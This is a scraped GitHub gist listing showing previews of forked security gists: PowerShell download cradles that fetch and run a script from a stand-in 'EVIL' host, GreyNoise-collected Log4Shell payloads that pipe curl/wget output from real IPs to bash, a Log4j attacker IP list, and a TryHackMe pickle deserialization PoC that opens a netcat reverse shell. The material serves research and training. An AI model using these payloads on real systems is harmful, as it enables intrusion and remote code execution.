Security Advisories / Bulletins linked to Log4Shell (CVE-2021-44228)
- If you want to add a link, comment or send it to me
- Feel free to report any mistake directly below in the comment or in DM on Twitter @SwitHak
dyetto
dyetto
/ DownloadCradles.ps1
Created
June 1, 2025 10:52
— forked from HarmJ0y/DownloadCradles.ps1
Download Cradles
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # normal download cradle | |
| IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
| # PowerShell 3.0+ | |
| IEX (iwr 'http://EVIL/evil.ps1') | |
| # hidden IE com object | |
| $ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r | |
| # Msxml2.XMLHTTP COM object |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| """ | |
| You can run this in the following format: | |
| For decimal: python3 ip2dh.py D <Ip-address> | |
| For Hexadecimal: python3 ip2dh.py H <Ip-address> | |
| """ | |
| #!/usr/bin/python3 | |
| import sys | |
| if len(sys.argv) < 3: |
dyetto
/ CVE-2021-44228_IPs.csv
Created
December 12, 2021 07:08
— forked from gnremy/CVE-2021-44228_IPs.csv
CVE-2021-44228 Apache Log4j RCE Attempts Dec 12th 12:15AM ET
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ip | tag_name | |
|---|---|---|
| 209.141.45.227 | Apache Log4j RCE Attempt | |
| 209.127.17.234 | Apache Log4j RCE Attempt | |
| 197.246.171.111 | Apache Log4j RCE Attempt | |
| 195.123.247.209 | Apache Log4j RCE Attempt | |
| 185.107.47.215 | Apache Log4j RCE Attempt | |
| 178.17.171.102 | Apache Log4j RCE Attempt | |
| 150.158.189.96 | Apache Log4j RCE Attempt | |
| 145.220.24.19 | Apache Log4j RCE Attempt | |
| 121.5.219.20 | Apache Log4j RCE Attempt |
dyetto
/ base64_payloads.csv
Created
December 12, 2021 06:26
— forked from nathanqthai/base64_payloads.csv
GreyNoise Log4Shell Payloads
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| b64decoded | hits | |
|---|---|---|
| (curl -s 45.155.205.233:5874/<IP_ADDRESS>||wget -q -O- 45.155.205.233:5874/<IP_ADDRESS>)|bash | 2056 | |
| (curl -s 80.71.158.12/lh.sh||wget -q -O- 80.71.158.12/lh.sh)|bash | 162 | |
| (curl -s 80.71.158.44/lh.sh||wget -q -O- 80.71.158.44/lh.sh)|bash | 2 |
dyetto
/ 20211210-TLP-WHITE_LOG4J.md
Created
December 12, 2021 05:32
— forked from SwitHak/20211210-TLP-WHITE_LOG4J.md
BlueTeam CheatSheet * Log4Shell* | Last updated: 2021-12-12 0023 UTC
dyetto
/ rce.py
Created
December 4, 2021 08:39
— forked from searchformyusername/rce.py
TryHackMe OWASP-10-A8: Insecure Deserialization RCE PoC
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import pickle | |
| import sys | |
| import base64 | |
| command = 'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | netcat YOUR_TRYHACKME_VPN_IP 4444 > /tmp/f' | |
| class rce(object): | |
| def __reduce__(self): | |
| import os | |
| return (os.system,(command,)) |